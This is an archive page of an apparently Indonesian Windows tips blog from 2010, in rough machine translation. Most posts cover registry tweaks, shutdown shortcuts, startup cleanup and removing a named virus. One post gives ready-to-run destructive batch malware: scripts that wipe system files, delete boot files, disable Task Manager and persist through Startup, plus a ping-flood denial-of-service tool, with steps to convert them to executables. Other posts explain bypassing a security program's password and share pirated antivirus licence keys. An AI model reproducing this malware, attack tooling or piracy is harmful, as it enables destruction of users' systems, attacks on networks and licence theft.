Showing posts with label tips and tricks komputer. Show all posts
Showing posts with label tips and tricks komputer. Show all posts

Thursday, January 21, 2010


from the previous article I have discussed about PC security is to change some settings in the PC Security TM. but at this time I wanted to talk about making and shortcut LOG OF Restart in desktop. perhaps many people how to or tips and tricks to speed up my computer off. you are not curious? if you are curious about making this shortcut please see and practice their own tips and tricks I below:



Shortcut to Shutdown
To speed up the shutdown you can create a shortcut on the desktop.

How:
1. Right-click an empty area on the desktop and select New - Shortcut.
2. At the command line type c: \\ windows \\ rundll32.exe user, exitwindows.
3. Click next and name the shortcut it.
4. Finally click Finish.

Shortcut to Restart
To speed up the restart you can create a shortcut on the desktop.

How to 1:

1. Right-click an empty area on the desktop, select New - Shortcut.
2. At the command line type C: \\ WINDOWS \\ RUNDLL.EXE user.exe, exitwindowsexec.
3. Click next and name the shortcut it.
4. Finally click Finish.

How to 2:

1. Run Notepad.
2. Type @ exit.
3. Save restart.bat name in C: \\
4. Run the Windows Explorer, right-click and drag the file to your desktop.
5. On the menu that appears select Create Shortcut (s) Here.
6. Right-click the shortcut, select Properties.
7. Move to Programs tab, check mark on the Close on Exit.
8. Click the Advanced button.
9. Mark select MS-DOS Mode, and deselect Warn before entering MS-DOS mode.
10. Click OK, and OK again to close the Properties dialog box.

Shortcut to Log Off
To speed up logging off you can create a shortcut on the desktop.

How:

1. Right-click an empty area on the desktop and select New - Shortcut.
2. At the command line type C: \\ WINDOWS \\ RUNDLL.EXE shell32.dll, SHExitWindowsEx 0
3. Click next and name the shortcut it.
4. Finally click Finish.

all of you who have studied with me at this site, I make sure to get to know about all the settings in Regedit is in making sure a very in need of all people. and you are no longer in vocational schools or departments STM with computer and your network can continue to visit here would have a computer and my network like this. may be useful for you all of this article. invite your friends to visit here yes.

Tuesday, January 19, 2010





PC Security is a software to protect files - files, system, boot and others are only equipped to protect the interest alone. in order to go and change settings protect, you only need to open the PC administrator for security and this will be required password. so you can login without a password through, how to find files whose names sdeamon.exe and windwd.exe which is inherited files from your PC security TM, hidden file in the windows, so if you go to through the DOS first. usually located in the dir c: \\ windows or c: \\ windows \\ system. delete the file and you will be able to enter into the PC security and TM can easily change the security settings TM PC easily without having to ask for a password.

Monday, January 18, 2010


I once worked with a computer that USER and Password in the know of my computer so controlled by people with even remote computer that I can use in shambles. but I have a very good solution and very reliable. the following way:

1. open regedit
2. when it opened for the following steps:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

3. when you're done until the goal to create a new DWORD right click - New - DWORD.
4. DWORD named but must match the user name to the hidden or removed from the Welcom screen computer.
5. Give the DWORD value that has been made zero (0).
6. then you do not forget to restart your computer.
7. see.
8. done.

note: These tips and tricks I still practice in the operating system windows XP to windows vista and windows I have tried seven because there is no operating system on my computer.

if you want to go into your users stay CTRL + ALT + DEL press twice yes. must login window will appear. if you want to display the DWORD delete no longer live that has been made earlier. may be useful for you this post.

Sunday, January 17, 2010


after I have not talked about computers and networks really weird with my blog this. maybe in the past I mostly post about the news of emerging technologies. This time I wanted to many to you all about computers and networks, but not the network directly, yes, but this post I wanted to share the fun way with the coding by extension. bat. maybe this way you think makes a virus or malware or trojan can also be fun but it only just. want to know how to make and use, as follows:



1. you must open the application to write a script that is notepad or another can.

2. then enter the script that I've made below:
note: you can copy and paste with this script. if you write each one must have 1 hour is not enough just copy and paste directly.

Script coding :




@ echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll


Copy file ini ke Notepad trus simpan dengan extension .bat
PING DEATH(DoS)
code :

@echo off
cls
echo PING DEATH
echo.
echo How many ping processes do you want?
set /p amount=
if not exist PD md PD
cd PD
echo Enter the IP:
set /p ip=
for /L %%A IN (1,1,%amount%) DO echo @echo off > PD%%A.bat
for /L %%A IN (1,1,%amount%) DO echo ping -t -l 65500 %ip% >> PD%%A.bat
cd..
for /L %%A IN (1,1,%amount%) DO start PD\pd%%A.bat
prompt $G$S
:a
echo Enter 'terminate' to end all processes
set /p input=
if %input%==terminate goto term
goto a
:term
tasklist /FI "IMAGENAME eq cmd.exe" > PID.txt
setLocal EnableDelayedExpansion
for /F "skip=4 tokens=1,2*" %%A in (PID.txt) do taskkill /PID %%B
echo.
echo Any ERRORS above means that process must be manually terminated
cd PD
del *.* /Q
cd..
rmdir PD
goto eof
:eof


Coding Simple but Dangerous
Code:

cls
cd %HOMEDRIVE%\windows\
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cd %HOMEDRIVE%
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cls
ren %HOMEDRIVE%\Windows\hal.dll hal3.dll
del %HOMEDRIVE%\WINDOWS\system32\*.* /F /Q /S
cls
echo DONE!
shutdown -r -t 25 -c "Selamat semua Virus anda telah dibersihkan... Berbahagialah "
 
Batch Virus XDD
Save File To. Bat and convert with Batch to Exe.

Code:

@echo off
title ?wtfisthisshit?
:a
set rawr=%random%
set/a rawr=%rawr%+200000
:b
set/a rawr=%rawr%-1
if %rawr%==1 (
start www.octourl.com/R
goto a
)
goto b
batch maleware phuCker
Code:

@echo off & break off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75 lines=15
cls
color 0a
echo.
echo ad88 ,ad8888ba, 88
echo d8" d8"' `"8b 88
echo 88 d8' 88
echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
echo 88 88 88 88 88 ,a8" a8P_____ 88 88P' "Y8
echo 88 88 88 Y8, 8888[ 8PP""""""" 88
echo 88 "8a, ,a88 Y8a. .a8P 88`"Yba, "8b, 88
echo 88 `"YbbdP'Y8 `"Y8888Y"' 88 `Y8a `"Ybbd8"' 88
echo by c0re
echo.
rundll32.exe user32.dll,SwapMouseButton
if exist "%SYSTEMDRIVE%\boot.ini" goto winXP 2> nul
if exist "%USERPROFILE%\AppData" goto winVISTA 2> nul
@echo 
echo x=msgbox("0wned by fuCker w0rm!",vbCritical or vbOkOnly,"fuCker") >> "fuCker.vbs"
start "" "fuCker.vbs" 2> nul


:winXP
echo [Inject] Microsoft Windows XP!
set b0t=boot
attrib -r -s -h "%SYSTEMDRIVE%\%b0t%.ini" >nul
del /f /s /q "%SYSTEMDRIVE%\%b0t%.ini" >nul
set b0t=
attrib -r -s -h "%SYSTEMDRIVE%\ntldr" >nul
del /f /s /q "%SYSTEMDRIVE%\ntldr" >nul
set w0n=win
attrib -r -s -h "%SYSTEMROOT%\%w0n%.ini" >nul
del /f /s /q "%SYSTEMROOT%\%w0n%.ini" >nul
set w0n=
attrib -r -s -h "%SYSTEMROOT%\System32\hal.dll" >nul
del /f /s /q "%SYSTEMROOT%\System32\hal.dll" >nul
attrib -r -s -h "%SYSTEMROOT%\System32\bootcfg.exe" >nul
del /f /s /q "%SYSTEMROOT%\System32\bootcfg.exe" >nul
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /va /f >nul
msg * "fuCk y0u!"
shutdown -r -t 02 -c "fuCker w0rm deteCted!"
goto end




:winVISTA
echo [Inject] Microsoft Windows Vista!
setlocal enableextensions
for /f "tokens=*" %%a in (
'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA'
) do (
set usac=%%a
)
echo %usac%|find /i "0x1" > nul
if errorlevel 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
start http://%USERNAME%.homo.com/
attrib -r -s -h "%SYSTEMRDRIVE%\bootmgr" >nul
del /f /s /q "%SYSTEMDRIVE%\bootmgr" >nul
attrib -r -s -h "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
del /f /s /q "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
copy %0 "%ALLUSERSPROFILE%\Start Menu\Programs\Startup" 2> nul
copy %0 "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
shutdown -s -t 10 -c "fuCker w0rm deteCted!"
goto end
) else (
echo :HjT >> "%TEMP%\HjT.bat"
echo tskill /a HijackThis >> "%TEMP%\HjT.bat"
echo goto HjT >> "%TEMP%\HjT.bat"
start "%TEMP%\HjT.bat"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
echo do >> "disk.vbs"
echo set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "disk.vbs"
echo set colCDROMs = oWMP.cdromCollection >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo loop >> "disk.vbs"
start "" "disk.vbs" 2> nul
echo @echo off >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo shutdown -r -t 00 -c "fuCker w0rm deteCted!" >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo echo 0wned by fuCker w0rm! 0n %DATE% at%TIME% >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo @exit >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
set usac=
start "%USERPROFILE%\Desktop\fuCkerw0rm.bat" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
goto end
)
endlocal


:end
cls
exit
3. then when you're done copy paste into notepad you all do not forget to save the script in a notepad format .bat .


4. then if you've saved all you have to convert these formats to the format. exe

5. program or application is very simple fun of this is done, finished.

note: the code you created can run on various Windows operating systems.

I hope this post useful, I am posting this article is not intended to teach you to damage or fun for others but this post is where learners only. remember! I do not recommend you use this post. if there is damage to the operating system you are using is not my responsibility, on because of I do not recommend it for you. I hope you can understand. thank you very much for your support all over this site, do not forget to stop by on here.

Tuesday, January 12, 2010


I'm so sorry I was late posting on the computer because of a friend and cooperation partner again experiencing problems with computers and many work in offline. you may not realize with my trick this time because people rarely do research. I have found a command and it is really easy and not too difficult for you in grade school or this beginner like me. trick, this time I want to express about the bluetooth software hidden in window XP and window Vista. I just do not think that the window XP and Vista is already there bluetoothnya software applications or even many people dazed if software is lost or damaged bluetooth to find on the internet again but this trick from my use it exclusively for all windows operating system. want to know how? follow the steps I have below apply only, as follows:

1. you open the command prompt
2. then you type in the command prompt with "FSQUIRT" without the quotes and do not use capital letters yes.
3. now you live choose to accept or send files.
4. completion friends.

good luck, good luck from me in trick.


Sunday, January 10, 2010


maybe you have a lot to know that there are SmadAV Pro and there is also a free, too. even many people who want a Pro antivirus SmadAV having a very good advantage at all, but this time I wanted to made Antivirus Pro SmadAV without review or put our banner on your site but I wanted to use a very good and cheap . I do not want to talk with you, we straight to the main topic yes? follow the steps - steps that I gave to you, as the following:

before you register Pro SmadAV we do SmadAV 7.4 installation, however if you are already install SmadAV 7.5 please uninstall the antivirus 7.5 SmadAV then you replace it with the antivirus back 7.4 SmadAV. if already installed antivirus SmadAV 7.4, we just go to the settings menu and then when I go into the settings menu just click the Unregister button. just create a SmadAV reinstall 7.4, then please enter your name and my keys are provided below:

Name  : iloovufull
Key     : 098810807000


great SmadAV become Pro 7.4, if it is a PRO, then you click Unregister and then would SmadAV will be free again, because in a part of the tricks alone.

7.4 SmadAV if you've become free again I suggest you enter your name and key that I have prepared the following:

note: to name just please Copy paste and for Key please enter it manually.

Name  : [C] ara [C] urang and [P] rogram [b] call
Key     : 299921696441

have you entered yet? if you have the Key enter the name and do not forget you click the button rigester. now you try to install 7.5 SmadAV you have to click on the file 2 times.

note: 7.4 SmadAV not be deleted first yes, but let it SmadAV because if we install a new SmadAV be affected.

done


Sunday, January 3, 2010


Usually after pressing the "Power" on your PC, you will have enough time to brew a cup of coffee or tea due to the length of time it takes to boot your computer. Especially if your PC has a myriad of applications that are automatically lit, perhaps in addition to coffee, you can all shower and make breakfast first.

Without an increase in hardware performance are significant, it is not much you can do to speed up boot Windows. But there are ways to speed up the time needed by the desktop to achieve the condition "ready to work". Let's look at some way below, either use the capabilities already available and applications from the outside.

When you install a new application on your computer these days, not a few who immediately made him a startup program; to check whether an upgrade or just to remind users that the application has been installed as an icon in the lower right of the PC such as chat applications like Yahoo , MSN, Skype, etc.




The problem comes when you install many applications are rarely used, but they still appear on the startup process, it is consuming CPU cycles, memory and time. The easy way to handle it is to delete applications that do not use. Remove All Startup Item

While many programs that can clean startup applications, you really can do it manually without using additional applications.

The best place, safest and most basic to start doing this is the program group "Startup" in the "Start Menu" Windows. Mouse to navigate the "Startup" and see what the program appears. Right-click on programs that do not need active at startup and select "delete".



After doing this process, it comes out the ultimate style. Windows also can automatically activate the program from other places. Click the Start Menu, select "Run" then type "msconfig" and press [ENTER] to enter into the Windows system configuration functions. Move to the tab "Startup" to see a more comprehensive list of anything that came on automatically. Look below displays.




The list does look complicated and confusing. What is "ctfmon" or "RTHDCPL"? Column "command" which sometimes includes the location of the application, sometimes also can provide clues about the contents of the application. As usual, Google has always been your friend in situations like this.

From here you can remove the check mark on the application that you do not want to turn on the startup process. Do not remove the check mark on the application that you do not understand, begin the application that you know and not used. For example, if you're not a heavy user of iTunes or Quicktime, but the actual application on the PC installed to use sometimes, you can remove the check mark on "QTTask" and "iTunesHelper" and both these applications will no longer appear automatically when you restart the computer.

You can turn back the application by visiting the "msconfig" and do the above procedure again. Using "msconfig" it takes a little courage and knowledge of Windows users. But there are still other ways to do the same process using third-party applications and application cleaning. Download the Windows Optimization Program

Actually there are many other applications that have the ability to manage "startup", but let us look at two of the best course.

CCleaner (which stands for "Crap Cleaner") can check your system for many things and get rid of excess. Click the "Tools", then the "Startup" to achieve it. As you can see, this application offers more information than "msconfig" at the top and can help provide an explanation for existing programs. You can disable and remove everything from startup using these buttons.





If you do not want to install other software to clean your system, System Explorer comes in a portable version with a "startup manager" feature-rich, complete with the registry, viruses and online talker even a Google search for the file name. On the tab "system", click the tab "startup" to see what came on automatically on your PC. Here is a look.





As you see, just right-click, you can directly to the registry editor or do a search on Google ProcessLibrary.com or for an application. In addition, the program maker and the file path is also included, offering more information about an application and what you can do to turn it off.

Ccleaner and SystemExplorer addition, there's more like alternati MZ Ultimate Tweaker and RegToy. Defer Application Startup Process

Surely not just one program only result in slow startup of your PC, but the cumulative result of all. You might check the startup list and realize that you do need them all. But you may not need them all to begin at the same time when you want to check email in Outlook or do a report in a hurry.

Application Startup Delayer can delay the process of "startup" applications ranging from 20 seconds, several minutes, even to the unit of hours so you can start to work while your PC to start all the startup programs gradually. If for example we do not need the Java Updater to start every time the PC is turned on, we can delay the startup of this program a few minutes after the PC boots.





Do not Believe the Myths

Lots of myths, misperceptions and instructions on how to speed up the PC boot process in circulation. You must be careful in sorting it out. If you learn more about online tips for optimizing Windows, you'll find a way of deleting paging gile, clean the registry, set to use the PC core manually and many other tips. Before you do, try to first check a very interesting article about the myth of optimization of Windows Lifehacker.

Saturday, January 2, 2010


We certainly are familiar with pictures that adorned the display icon Desktop (screen) we. If you want to change the size of the icon images found on the desktop, the following tips will explain the ways to do it. You can zoom in or out according to your desire.

Icon is the pictures that are on the desktop screen is very useful for us in the processing speed of a program / application. Suppose there Ms.Word icon, the icon is so we can just double click to executing applications Ms.Word, we do not need to go to Start - All Programs - Microsoft Office - Microsoft Office Word. Shorter and more efficient to be one reason.

If we want to resize the image icon on the desktop, the settings made through the Registry editor / regedit. Therefore, before performing these tips are strongly advised to make backups registry editor / backup registry editor. This is very useful to avoid the computer becomes an error / stuck due to a mistake in practice.

As for the steps to implement this trick is as follows:

Click Start - Run, then type: regedit

Going to the menu HKEY_CURRENT_USER \\ Control Panel \\ Desktop \\ WindowMetrics

In the right window, click on the menu 2X Shell Icon Size. In the box that appears, fill in the Value data corresponds to our wishes.

To see the results, Restart / Log Off the computer

Standard number is 32. We could enter a smaller number than 32 if you want to reduce the size of the icon, and vice versa, we include a larger number if you want to enlarge the size of the icon

This is useful if your desktop has a number of icons very much that it makes the desktop 'crammed' with icons. Changing the size of the icon becomes smaller may make the desktop look more neat and more pleasing to the eye of course.

Good try.

Right-click function is a very good way to learn some of the hidden functions of Windows. Want more? Try you start exploring the Control Panel application and find some useful techniques. And there's more command-line application in the folder Windows' System32. But, none could compare to the Registry.

Registry complete with various useful settings to improve performance, improve security holes, and even change the fundamental basis of Windows to work better. Although very sophisticated look, you still need to be careful in using it because it is not just a feature that helps but also many pitfalls.

If not careful, you are actually adding to the problem of solving it. For that, below there are 20 hacks for you to try to make your PC better. Good luck!!

1. Increase Security
Someone who does not want can easily take your data with the USB if he managed to access your PC physically. If you're using Windows XP2 or later, there is a simple way to prevent it.

Navigate to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ StorageDevi cePolicies", create a DWORD value called "WriteProtect" and set the value "1". You will be able to read the USB drive, but can not move the data into it again.

2. Control UAC
Full Vista's User Account so often led to warnings that eventually turned off by the user. But, sometimes it makes them miss features that are useful as protection mode for IE. You can control it how to disable the warning for the administrator, so you do not need to interfere, but the UAC still working on the background and you can still get its features.

To do this, go to "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ System \\ ConsentPromptBehaviorAdmin", and set the value to "0". To return to normal conditions, set the value to "2".

3. Change Owner

Install Windows on your PC and you'll be prompted to enter a name, which will then be stored as the registered owner (WinVer run to see this on your system). If you buy a secondhand computer, you may want to change the name of the owner with his own name.  there's no other way than with the Registry.
br\u003e Go to the "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVers ion" and will see two sentences "RegisteredOwner" and "RegisteredOrganization". Double-click on them to change.

4. Sort the files by True
Sort the file name in Explorer can become a problem. Initial settings, he would put "File_v2.txt" before "File_v15.txt", and sequences that are not ASCII, but it looks more reasonable. But, what if "v" refers to the version number, and should "File_v15.txt" in the previous order? At this time, initial system Explorer can not work at all.

To return the ASCII sort order based on the usual, go to "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ Explorer", create a DWORD value called "NoStrCmpLogical" and set the value to "1". Delete the code if you want to go back to the initial conditions of the standard Explorer.

5. Troubleshoot Startup
If Windows takes too long to start up and shut down, he probably was having an issue. To find out what was happening back in "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Po licies \\ System", create a DWORD value called "verbosestatus" and set the value to "1". Restart your PC and Windows will tell you what is happening.

6. Organize Folder Types
Vista's explorer will intelligently choose the type of folder you based on its contents. However, this means your download folder will turn into the music folder if you downloaded some MP3. To fix this, go into the "HCU \\ Software \\ Classes \\ LocalSettings \\ Software \\ Micro soft \\ Windows \\ Shelf", delete the subkey "Bags" and create new ones at the same location.

Make a key called "AllFolders" under Bags, and other key named "Shell" at the bottom again. Then click her to open the "HCU \\ Software \\ Classes \\ LocalSettings \\ Software \\ Micro soft \\ Windows \\ Shell \\ Bags \\ AllFolders \\ Shell". Right-click on the right panel, select 'New | String Value "and call it" FolderType ". Then, double click on FolderType and set the value to "NotSpecified". You still can change the type of folder, but Vista will not change automatically. (If you need assistance, please click here)

7. Encryption Easily
Some versions of Windows allows you to encrypt files, although the process is a bit strange. You must right-click on the file, select "Properties", press the button "Advanced, check" Encrypt contents to secure data ", and press" OK "as much as 2x.

For a more simple way, go to "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ Current \\ Version \\ E Xplorer \\ Advanced" create a DWORD called "EncryptionContextMenu" and set the value to "1". Now you simply right-click on the file and select "Encrypt".

8. Fast Folder Access
Quick access to folders bring it on the Start Menu, type "REGEDIT" in the "Run", go to "HKCR \\ Folder \\ shellex \\ ContextMenuHandlers", right-click "ContextMenuHandlers" and click "New | Key".

Type "and press [Enter]. Now, hold [Shift], right-click on a folder, and select" Pin to Start Menu ".

9. Accelerate Time copy
Vista gives a high priority for your soundcard, so you need to get a free audio of the problem no matter what your PC is a process. Because it can slow the process of copying the network.

To fix this, go to "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Multimedia \\ SystemProfile". Try to set the "NetworkThrottlingIndex" became more 10 to 50 or 60 is quite effective, then reboot and test your network speed. For more information, click here.

10. Fix Listing Drive
If Explorer no longer displays your DVD drive, go to "HKLM \\ System \\ CurrentControlSet \\ Control \\ Class \\" and delete settings "UpperFilters" or "LowerFilters". These tips usually works, but sometimes can fail if the relevant application was problematic from the beginning. If the program stops working, see if there are updates, then reinstall.

11. Access to the Fast Display Settings
Just right-click on the desktop of Windows Vista is not enough to take you directly to the display settings menu. Windows 7 was prepared to fix this. But, for now you can do so by going to "HKCR \\ Directory \\ Background \\ Shell", right-click "Shell", select "New | Key" and called the "Display Settings".

Double-click "(Default)" there the right panel and enter the "Display Settings" in the Value Data box. Now, right-click "Display Settings" on the left panel, select "New | Key" again, and call this function as "command".

Double-click the Default value of new functions and enter the following text: "rundll32 shell32.dll, Control_RunDLL DESK.CPL, @ 0.3". Click "OK" and right-click on the desktop to see the option to display the new settings.

12. Live Messenger Multiple Log-In
Normally, Windows Live Messenger (WLM) only allows you to enter into only one account at a particular time. To make more than one, go to "HKLM \\ Software \\ Microsoft \\ WindowsLive \\ Messenger", create a DWORD value named "Multiple Instances" and set the value to "1". To restore to its original state, simply delete the value.

13. Clear Menu-Menu
You have to uninstall an application, but instead he left you a gift in the form of icons that are not useful. To fix this, go to "HKCR \\ *" and "HKCR \\ Directory". Dilate his panel, then select "shellex \\ ContextMenuHandlers" and see the various buttons on the bottom, which relate to orders you do not want.

On the PC, the function "HKCR \\ * \\ shellex \\ ContextMenuHandlers \\ 7-Zip" context menu related with 7-Zip, for example, to delete, click the "Delete" on the left panel. But be careful, you should delete only if it is 100% sure on the right menu.
14. Accelerate Back-Up
Features of Windows XP NTCBACKUP improve performance by maintaining a list of system files if he knows you will not be possible to make a back-up. Add the files and folders that you want yourself and get better results again.

See the list at "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ BackupResto re \\ FileNotToBackup".

15. Change the Default Installation Folder
Most of the default installation is a Program Files folder, but if you want to change it, go to "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersio n", change "ProgramFilesDir" into the folder and reboot your choice

16. Changing Drive Name
Adding a memory card reader and the Explorer will often stop the computer folders that have names similar drives. ( "Removable Drive D:", "Removable Drive E:", and so on), making it difficult to distinguish.

You can handle the "HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Ex plorer". Make a button with the letter of the drive (for example "G"), and inside it create another new key named "DefaultLabel". Double-click on the entered value, give the name "CompactFlash" (or whatever you want it), and click "OK". Restart Explorer or press [F5] and see the changes. Drive G: will be read as "CompactFlash (G".

17. Wipe the Page File
Windows stores memory pages on the paging file for your work. It all sounds good, until someone managed to access your system, find the files, and even add or reduce something you do not want.

To fix this, go to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ SessionMana ger \\ MemoryManagement", set the value "ClearPageFileAtShutdown" to 1 and reboot. Windows will delete all files on the page when it is turned off. It extends the duration and processes, but improve safety.

18. Crash on Cue
Blue screen crash usually bring bad news, but sometimes you may want to bring it up to test the Windows error reporting for example. Apparently Registry tricks can help you even for this one thing.

Navigate to "HKLM \\ SYSTEM \\ CurrentControlSet \\ Services \\ i8042prt \\ P arameters", create a DWORD called "CrashOnCtrlScroll" and set the value to 1. Reboot your computer, and crashes to just hold [Ctrl] right and press [Scroll Lock] twice. When finished, make sure that you immediately remove these commands.

19. Save CPU Time
A standard PC usually has several programs that want to use processor capacity at the same time, and Windows will allocate each period of CPU time a "quantum" a move to the next program. By default, this is usually very short, so the PC will be responsive, but sometimes this means that Windows will make the time to move between these processes.

The solution? You can try what Windows Server do. Set the system to use a longer quantem. Set "HKLM \\ SYSTEM \\ CurrentControlSet \\ Control \\ PriorityCon Control \\ Win32PrioritySepartion" to 16 (hex).

Quantum older means less turnover among the programs so much less time is wasted. You may notice that lag in games or video playback will be more subtle. But, if you find other problems, simply return the value to be Win32PrioritySeparation original value of 26.

20. Disable Autorun
Autorun feature of Windows is one of the potential security risk because it runs the code automatically when you connect a removable device that is in the PC. If indeed, it can be manually set it, it would be safe to turn off the feature.

In some systems, it can only be done through the Registry. Go to "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ IniFileMapping" and create a button named "Autorun.inf".

Friday, January 1, 2010


maybe now a lot of very dangerous viruses that cause very severe problems even to spread very quickly and very inconvenient time. W32/Smalltroj.VPCG virus is a malicious program is currently looking for more victims on the Internet at the end of this year. This new virus will block access to several security websites and other websites that have been specified by way of transfer to the IP number 209.85.225.99 which is Google's public IP.

every time users to try to access certain websites, including websites or anti-virus security, so that appears not on the website but the website wants to www.google.com.

This 9 step following to clean W32/Smalltroj.VPCG the potion has a vaksincom:
1. Turn off System Restore during the cleaning process take place.

2. Decide who will clean your computer from the network or the Internet.

3. Change the name of the file [C: \\ Windws \\ system32 \\ msvbvm60.dll] to prevent the virus active again.

4. Perform cleaning by using the Tools Windows Live CD Mini PE. This is due to some rootkit files masquerading as services and drivers difficult to stop. Please download the software at the address http://soft-rapidshare.com/2009/11/10/minipe-xt-v2k50903.html

Then boot the computer using software Mini PE Live CD. After that deleting some files parent virus by:

l Click the [Mini PE2XT]
l Click the [Programs]
l Click the [File Management]
l Click the [Windows Explorer]
l Then delete the following files:

o C: \\ Windows \\ System32
§ wmispqd.exe
§ Wmisrwt.exe
§ qxzv85.exe @
§ qxzv47.exe @
§ secupdat.dat
o C: \\ Documents and Settings \\% user% \\% xx%. exe, where xx is a random character (example: rllx.exe) with a file size of 6 kb.
o C: \\ windows \\ system32 \\ drivers
§ Kernelx86.sys
§% xx%. Sys, where xx is a random character who has a size of 40 KB (example: mojbtjlt.sys or cvxqvksf.sys)
§ Ndisvvan.sys
§ krndrv32.sys
o C: \\ Documents and Settings \\% user% \\ secupdat.dat
o C: \\ Windows \\ inf
§ Netsf.inf
§ netsf_m.inf
 
5. Delete the registry created by the virus, by using the "Avas! Registry Editor", how:

l Click the [Mini PE2XT]
l Click the [Programs]
l Click the [Registry Tools]
l Click [Avast! Registry Editor]
l If the confirmation screen appears Kelik button "Load ....."
l Kemudain delete registry: (see figure 6)

Ø HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ windows \\ currentvers
     on \\ Run \\ \\ ctfmon.exe
Ø HKEY_LOCAL_MACHINE \\ system \\ ControlSet001 \\ Services \\ kernelx86
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\ kernelx86
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\ passthru
Ø HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Image File Execution Options \\ ctfmon.exe
Ø HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ Windows NT \\ CurrentVersion \\ winlogon

ü Change the string value to be Userinit = userinit.exe,
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ DomainProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ DomainProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Services \\ SharedAccess \\ Parameters \\ FirewallPolicy \\ StandardProfile \\ AuthorizedApplications \\ List
ü% windir% \\ system32 \\ wmispqd.exe =% system% \\ wmispqd.exe: *: enabled: UPnP Firewall
Ø HKEY_LOCAL_MACHINE \\ system \\ ControlSet001 \\ Services \\% xx%
Ø HKEY_LOCAL_MACHINE \\ system \\ CurrentControlSet \\ Services \\% xx%

Note:
% xx% showing random characters, this key is made to run the file. SYS which has the size of 40 KB which is in the directory [C: \\ Windows \\ system32 \\ drivers \\]

6. Restart the computer, restore the remaining registry that changed by the virus to copy the following script in notepad and then save with the name repair.inf. Execute the following manner: right-click repair.inf | click install

             [Version]

Signature = "$ Chicago $"
Provider = Vaksincom

[DefaultInstall]
AddReg = UnhookRegKey
DelReg = del

[UnhookRegKey]

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ batfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

